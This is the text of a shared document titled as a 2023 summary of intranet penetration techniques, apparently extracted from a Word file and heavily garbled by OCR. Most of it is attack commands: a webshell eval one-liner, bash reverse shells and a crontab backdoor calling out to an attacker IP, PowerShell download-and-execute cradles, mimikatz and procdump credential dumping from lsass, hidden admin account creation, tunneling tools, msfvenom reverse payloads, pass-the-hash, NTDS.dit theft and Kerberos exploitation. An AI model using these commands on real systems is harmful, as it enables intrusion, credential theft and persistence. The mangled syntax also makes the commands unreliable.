2023内网渗透知识点总结.docx

《2023内网渗透知识点总结.docx》由会员分享，可在线阅读，更多相关《2023内网渗透知识点总结.docx（32页珍藏版）》请在课桌文档上搜索。

1、内网渗透知识点总结获取webshell进内网测试主站，搜WooyUn历史洞未发现历史洞，github,svn,目录扫描未发现敏感信息，无域传送，端口只开了80端口，找到后台地址，想爆破后台，验证码后台验证，一次性，用ocr识别，找账号，通过google,baidu,bing等搜索，相关邮箱，域名等加常用密码组成字典，发现用户手册，找账号，发现未打码信息，和默认密码，试下登陆成功，找后台，上传有dog,用含有一句话的txt文件打包为zip,php文件即可，c刀被拦，修改config,ini文件php_makeeval(calIuserfuncarray(base64decode,array($_

2、POSTaction);用回调函数，第一个为函数名，二个为传的参数前期信息收集queryuser|qwinsta查看当前在线用户netuser查看本机用户netuser/domain查看域用户netview&netgroupdomaincomputersdomain查看当前域计算机列表第二个查的更多netview/domain查看有几个域netviewde查看de域内共享文件netgroup/domain查看域里面的组netgroupz/domainadmins*/domain查看域管netIocalgroupadministrators/domain/这个也是查域管，是升级为域控时，本地账户

3、也成为域管netgroupdomaincontrol1s,/domain域控nettime/domainnetconfigworkstation当前登录域-计算机名-用户名netuse域控（如）password/user:username相当于这个帐号登录域内主机，可访问资源ipconfigsysteminfotasklist/svetasklist/Sip/Udomainusername/P/V查看远程计算机tasklistnetIocalgroupadministrators&whoami查看当前是不是属于管理组netstat-anonltest/delist:xx查看域控whoami/a

4、ll查看Mandatory1.abeluac级别和sid号netsessoin查看远程连接session（需要管理权限）netshare共享目录cmdkey/1查看保存登陆凭证echo%logonserver%查看登陆域spn-1administratorspn记录Set环境变量dsqueryserver-查找目录中的ADDC/1.DS实例dsqueryuser-查找目录中的用户dsquerycomputer查询所有计算机名称windows2003dir/s*.exe查找指定目录下及子目录下没隐藏文件arp-a发现远程登录密码等密码netpass.exe下载地址：IImimikatz.exep

5、rivilege:debugtoken:elevateIsadump:samIsadump:secretsexitwifi密码：InetshwIanshowprofiIe查处wifi名netshwIanshowprofileWiFi-namekey=clear获取对应wifi的密码ie代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettingszz/vProxyServerregquery，ZHKEY_CURRENT_

6、USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsz,pac代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings*/vAutoConfigUR1./引子tstmai1powershell-11ishang其他常用命令pingicmp连通性vps-ipdns连通性digvps-curlvps:8080http连通性tracertbitsadmin/

7、transfernhttp:/ipxx.exeC:windowstempx.exe一种上传文件=2008fuser-nvtcp80查看端口pidrdesktop-uusernameipIinux连接win远程桌面(有可能不成功)wherefilewin查找文件是否存在找路径，1.inUX下使用命令find-name*.jsp来查找，Windows下，使用for/rc:windowstemp%iin(filelsss.dmp)doecho%inetstat-apngrep8888kill-9PID查看端口并kill远程登录内网主机判断是内网，还是外网，内网转发到VPSInetstat-ano没有

8、开启3389端口，复查下tasklistsvc,查SVChOSt.exe对应的TermService的pid,看netstat相等的pid即3389端口.在主机上添加账号Inetuseradmin1admin1/add&netIocalgroupadministratorsadmin1/add如不允许远程连接，修改注册表REGADD,HK1.MSYSTEMCurrentControlSetControlTerminalServer7vfDenyTSConnections/tREG_DWORD/d00000000/fREGADDHKEY_1.OCA1._MACHINESYSTEMCurrentC

9、ontrolSetControlTerminalServerWinStationsRDP-Tcpyz/vPortNumber/1REG_DWORD/d0x00000d3d/f如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许3389端口，命令如下：netshadvfirewal1firewal1addrulename=zzRemoteDesktopzzprotocol=TCPdir=inlocalport=3389action=allow关闭防火墙netshfirewallsetopmodemode=disable3389user无法添加：http:/www.91ri.org

10、5866.html*隐藏win账户*开启sys权限cmd:IEX(New-ObjectNet.WebClient).DownloadString(,adduser并隐藏：IIEX(New-ObjectNet.WebClient).DownloadString(,winserver有密码强度要求，改为更复杂密码即可：渗透技巧Windows系统的帐户隐藏Ihttps:/3gstudent.github.io3gstudent.github.io%E%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%9

11、0%E6%88%B7%E9%9%90%E8%97%8F/windows的RDP连接记录：httprcoil.me201805%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/Iinuxbashbash-i&devtcp10.O.O.1/80800&1bash-i交互的shell标准错误输出到标准输出devtcp10.O.O.1/8080建立socketipport0/1标准输入到标准输出I(crontab-1;echo,*/60*exec9OdevtcpIP/port;exec0&92&1;bin

12、bash-noprofiIe-i,)crontab-猥琐版I(crontab-1;printf*60*exec90devtcpIP/PORT;exec0&92&1;/bin/bash-noprofiIe-i;rnocrontabforwhoami%100c11)Icrontab-详细介绍Ingrok-backdoorGrok-backdoor是一个简单的基于python的后门，它使用Ngrok隧道进行通信。Ngrok后门可以使用Pyinstaller生成windows,Iinux和mac二进制文件。虽然免杀，但如果开win防火墙会提示，生成后门时会询问是否捆绑ngrok,选择no时，在被攻击机

13、执行时需联网下载ngrok,运行后，telnet连接即可.veil这里，安装问题有点多，我用kali-2018-32安装成功，先安装下列依赖，后按照官方即可。apt-getinstall1ibncurses5*apt-getinstallIibavutil55*apt-getinstal1gcc-mingw-w64*apt-getinstal1wine32生成SheIl./Veil,pyuse1usecmeterpreterrev_tcp在win用mingw下gcc编译bypass360gcc-ov.exev.c-lws232使用之前生成的veil,rcmsfconsole-rveil,rc一

14、句话开启http服务，虚拟机里开启，在外访问虚拟机ip即可下载虚拟机文件：python-mSimpleHTTPServer80ewtools:新版tools：*正向：*被攻击机（跳板）.*temp目录下：unzipew.zipfilesbininit（查看IinUX位数）chmod755ewfor1.inux./ewfor1.inux-sssocksd-19999（侦听0.0.0.0:9999）netstat-pantujgrep9999（查看是否侦听成功）* 攻击机.*Iproxychain设置socks5为跳板ipportproxychainnmap即可以用跳板代理扫描其他主机* *反向=

15、* 攻击机I*chmod777./ew_for_linux64./ew_for_linux-srcsocks-11080-e2333即被攻击机连接本机2333端口，转发到本机的1080端口，访问本机的1080端口，相当访问被攻击机的2333设置Iproxychainsocks5本主机ipport：1080proxychain代理即可*被攻击机.*Ichmod777ew_for_linux./ew_for_1.inux32-srssocks-d192.168.1.100-e2333ncnc简单使用https:/tom01i.github.io20170506nc/Iinuxroot权限Imkno

16、d/tmp/backpipep/bin/sh0tmp/backpipe权限不够用mkfifo/tmpbackpipe以上用nc监听即可Icx被攻击机lex.exe-slave139.1.2.3888810.48.128.253389vpslex.exe-1isten88885555在本机mstsc登陆139.1.2.3:5555或在VPS连接127.0.0.1:5555netshWirl自带（只支持tcp）360拦将本地80转到192.168.1.101:8080端口netshinterfaceportproxyaddv4tov41iStenport=80connectaddress-192.

17、168.1.101connectport=8080通过连接1.1.1IOl的8082端口，相当连接1.1.1.101可访问的内网192.168.2.102的3389端口Inetshinterfaceportproxyaddv4tov4Iistenaddress=I.1.1.1011istenport-8082connectaddress-192.168.2.102connectport=3389go+msf&py+msfbypass360msf编码生成后，用：gobuild-IdfIagS=-Hwindowsgui-s-w”即可，详细参考以下IinkIhttp:/hacktech,cn/201

18、70420msf-AntiVirus,html提权win提权辅助工具，原理主要通过Systeniinfo补丁信息比对漏洞库，工具链接Iinux提权辅助感谢前辈收集的提权exp:windows-kernel-exploitsWindows平台提权漏洞集合linu-kernel-exploits1.inux平台提权漏洞集合https:/msf1inux相关pay1oad：1inuxx86meterpreterreverse,tcp1inuxx86meterpreterbind_tcp1inuxx86shell_bind_tcp1inuxx64/shell/bind_tcp1inuxx64/shel

19、l/reverse_tcp1inuxx64/shell_bind_tcp1inuxx64/shell_bindtcprandomport1inuxx64shellreversetcpwindows相关payload:windows/meterpreter/reverse_tcpwindows/meterpreter/bind_tcpwindows/meterpreter/reverse_hop_httpwindows/meterpreter/reverse_httpwindows/meterpreter/reverse_http_proxy_pstorewindows/meterpreter/

20、reversehttpswindows/meterpreter/reversehttpsproxywindows/shell_reversetcpwindows/shell_bind_tcpwindows/x64/meterpreter/reverse_tcpwindows/x64/meterpreter/bind_tcpwindows/x64/shell_reverse_tcpwindows/x64shell_bind_tcp目标服务器为64位用x64监听，反弹meterpreter用含有meterpreter的模块，反弹普通的shell（例如nc）,shell_reversetcp模块监听

21、，例如msf:反弹shel1Imsfvenom-ax86-platformwindows-pwindows/meterpreter/reverse_tcp1.HOST=1.PORT=-fexeshell,exe监听：windows/meterpreter/reverse_tcp反弹shellexeipportnc-ecmd.监听windows/shell_reverse_tcpmeterpreter下上传uploadfile下载downloadfileMsf进程注入（测试winl没成功,win2008可以，360会拦）meterpretergetuidmeterpretergetpidmete

22、rpreterpsmeterpretermigrate676MsfhashImeterpreterrunhashdumpsysmeterpreterrunpost/windows/gather/smart_hashdump需要sys权限getsystem存在uac,用msfbypass,但特征明显meterpretersearchbypassuacmsfpowerdumploadmimikatz不太好用Msf的持续后门*PersiStence:*runpersistence-h用于创建启动项启动，会创建注册表，创建文件。（X86_1.inux不支持此脚本）runpersistence-U-i1

23、0-p10390-rfree,ngrok.cc会被360拦，-i1010秒请求一次，使用Powershel1执行也被监控而被360拦截meterpreter的rungetgui-e命令可以开启成功。360会提示阻止Runmetsvc-h：用于创建服务，会创建meterpreter服务，并上传三个文件，使用-r参数可以卸载服务，被拦Msfpowershellmeterpreterloadpowershellmeterpreterpowershell_shel1PSIEX(New-ObjectNet.WebClient).DownloadString(,https:/raw.githubuserc

24、ontent,com/PowerShel1MafiaPowerSploit/master/Exfi1tration/Invoke-Mimikatz.ps1,);PsInvoke-Mimikatz-DumpCreclsMsfRouter2个或多个路由之间，没有配置相应的路由表，不能访问，获得一台机器shel1session添加路由，使msf可以在当前shellsession下以被攻击机访问其他内网主机，meterpreterrunget_local_subnetsmeterpreterrunautoroute-s172.17.0.0/16添加路由meterpreterrunautoroute-p

25、查看路由meterpreterrunautoroute-d-s172.17.0.0/16删除MS17-010meterpreterbackgroundmsfsmb_exploit(multi/handler)useauxi1iaryscanner/smb_ms17_010msfauxiliary(scanner/smbsmb_ms17_010)setrhosts172.17.0.0/24msfauxi1iary(scanner/smbsmb_ms17_010)setthreads50msfauxiliary(scanner/smbsmb_ms17_010)run先利用expIoit/windo

26、ws/smbms17OlOpsexec,win10旧版依旧可以，新版设置smbuser,smbpass即可MSf扫描经过上面设置路由即可使用以下scan：Iuseauxiliary/scanner/portscan/synuseauxiliary/scanner/portscan/tcpproxychains设置socks4为以下设置，即可在本地代理扫描useauxi1iaryserver/socks4aMsf端口转发portfwd将192.168.1.2.100内网转发到本地4443port,流量大不好用portfwdadd-1.0.0.0.04443-p3389-r192.168.2.10

27、0Msf截屏（没被360拦没提示，或许有意外收获）meterpreteruseespiameterpreterscreengrabMSf嗅探meterpreterusesniffermeterpretersnifferinterfacesmeterpretersnifferstart5meterpretersniffer_dump5tmp1.pcapmeterpretersniffer_stop键盘记录Msf键盘记录在win不会创建新进程meterpreterkeyscan_startmeterpreterkeyscan_dumpmeterpreterkeyscan_stop如navicat,

28、putty,SecureCRT,P1.SQ1.设置记Keylogger（tip:可以把管理工具,住密码）一redrainixkeylog1inux=2.63推荐一redrain远程命令执行atschtaskspsexecwmicscps2012r2起，默认端口5985,系统自带远程管理winrswinrs-r:192.168.1.100-Uiadministrator-p:pwdipconfig这里schtasks用着很舒服，Ischtasks/createtnmytasktrF:Desktop.exe/scminute/mo1每分运行1次如果程序有参数用引号zzC:procdump64.ex

29、e-accepteula-malsass.exelsass.dmpzz/RU可以以system启动，例如Ischtasks/Create/TNtest/SCDAI1.Y/ST00:09/TRnotepad,exe/RUSYSTEMIschtasks/createtnmytasktr,C:procdump64.exe-accepteula-ma1sass,exe1sass.CImpscminute/mo2schtasks/Query/TNmytasknettimeschtasks/Query/TNmytaskschtasks/Delete/TNmytask/Fmimikatz+procdump获

30、得内存hash如果服务器是64位，要把Mimikatz进程迁移到一个64位的程序进程中，才能查看64位系统密码明文。32位任意运行procdump,exe-accepteu1a-ma1sass,exe1sass,dmp（管理权限）后lsass.dmp放到mimikatz.exe同目录，运行以下命令Imimikatz.exez*sekurlsa:minidumplsass.dmpzzlog”zzsekurlsa:Iogonpasswordszz导出当前mimikatz.exe/privilege:debugz,log”sekurlsa:IOgOnPaSSWords”IpowershellIEX(

31、New-ObjectNet.WebClient).DownloadString(,WindowsServer2012,部分WindowsServer2008默认无法使用mimikatz导出明文口令解决方法：启用Wdigestuth,cmd:IregaddHK1.MSYSTEMCurrentControlSetControlSecurityProvidersWDigest/vUse1.ogonCredential/tREG_DWORD/d1/fpowershel1:ISet-IternProperty-PathHK1.M:SYSTEMCurrentControlSetContro1Securit

32、yProvidersWDigestNameUse1.ogonCredential-TypeDWORD-Value1重启或者用户再次登录，能够导出明文口令，参考下文：3gstudent自动DUmP-CIear-TeXt-PaSSWOrd-after-KB2871997-installedISAM-hash管理权限：IregsaveHK1.MSYSTEMSys.hivregsaveHK1.MSAMSam.hivmimikatz:Isadump:sam/sam:Sam.hiv/system:Sys.hivpassthehashwmiexec普通权限即可https:/domain=TESTuser=t

33、est1Iwmiexec-hashes00000000000000000000000000000000:99b2bl35c9e829367d9f07201bl007c3TEST/test1192.168.1.1/zwhoami需要管理权限Imimikatzz,privilege:debugzzzzsekurlsa:pth/user:abc/domain:test,localntIm:hashzzImeterpreterrunpost/windowsgather/hashdumpmeterpreterbackgroundmsfuseexploit/windows/smb/psexecmsfexp

34、loit(psexec)setpayloadwindows/meterpreter/reverse_tcpmsfexploit(psexec)setSMBuserAdministratormsfexploit(psexec)setSMBPassxxxxxxxxxxxx9a224a3b108f3fa6cb6d:xxxxf7eaee8fbll7ad06bdd830b7586cmsfexploit(psexec)exploitmeterpretershell安装了KB2871997补丁或者系统版本大于等于windowsserver2012时，内存不再明文保存密码，1,改注册表后，注销再次登录，可以使

35、用，Schtasks等执行命令无法用管理员权限。2.用ptk,ptto例外，打补丁后administrato(SID-500)依旧可以pth|https:/3gstudent.github.io/3gstudent.github.io%E5%9F%9F%E6%B8%97%E9%80%8F-Pass-The-Hash%E7%9A%84%E5%AE%9E%E7%8E%B0/passthekey需要免杀：mimikatzprivilege:debugz,zsekurlsa:ekeys获取用户的aeskeymimikatzz,privilege:debug,zz,sekurlsa:pth/user:a

36、/domain:test,localaes256:asdq379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7el7df6d19d5c”注入aeskeydir计算机名passtheticket不需要管理员权限kekeotgt:ask/user:abc/domain:test,localntIm:hashzz导入ticket：Ikekeoz,kerberos:pttTGT_abcTEST.1.OCA1._krbtgttest.localTEST.1.OCA1.,kirbi程序地址：https:/ntds.ditvssadmin方法=win2008查询当

37、前系统的快照vssadmin1istshadows仓IJ建快照Ivssadmincreateshadow/for=c:获得ShadowCopyVolumeName为?G1.OB1.ROOTDeviceHarddiskVolumeShadowCopy47复制ntds.dit,copy第一个参数为创建快照时位置：Icopy?G1.OBA1.ROOTDeviceHarddiskVolumeShadowCopy47windowsNTDSntds.ditc:ntds.dit复制system和samcopy?G1.OBA1.ROOTDeviceHarddiskVoIumeShadowCopy47windo

38、wssystem32configsystemc:copy?G1.OBA1.ROOTDeviceHarddiskVolumeShadowCopy47windowssystem32configsamc:删除快照vssadmindeleteshadows/for=c:/quiet获取将以上system,sam,ntds.dit放到/root/ntds-cracking/下，运行Ipythonsecretsdump.py-ntdsrootntds-crackingntds.dit-system/root/ntds-cracking/SYSTEM1.OCA1.py地址：I域渗透一一获得域控服务器的NTD

39、S.dit文件http:/de定位nltestdelist:xx.xxnettime/domainsysteminfo中的domainipconfig/all中的DNSSuffixSearch1.ist扫描53端口，找dns位置setlognetgroup“domaincontrollers/domainPowerViewGet-NetDomainControllerPowerView地址：windowslog微软第三方信息收集工具1.ogParser.exepsloglist.exe等powerhsell神器nishangPn扫描PowerSploit针对PS的EmPireD:netuse1

40、92.168.1.254c$PWd/user:user连接192.168.1.254的IPC$共享，用UiIC路径D:copysrv.exe192.168.1.254c$复制本地srv.exe到C根目录D:nettime192.168.1.254查时间D:at192.168.1.25410:50srv.exe用at命令在10点50分启动srv.exe（这里360会拦截）D:netuse192.168.1.254c$/delmsl4-068Kerberos漏洞利用：生成TGT：用于伪造whoami/all获得：用户域名、用户sid、域主机Ipythonms14068.py-uadmin-ppasswo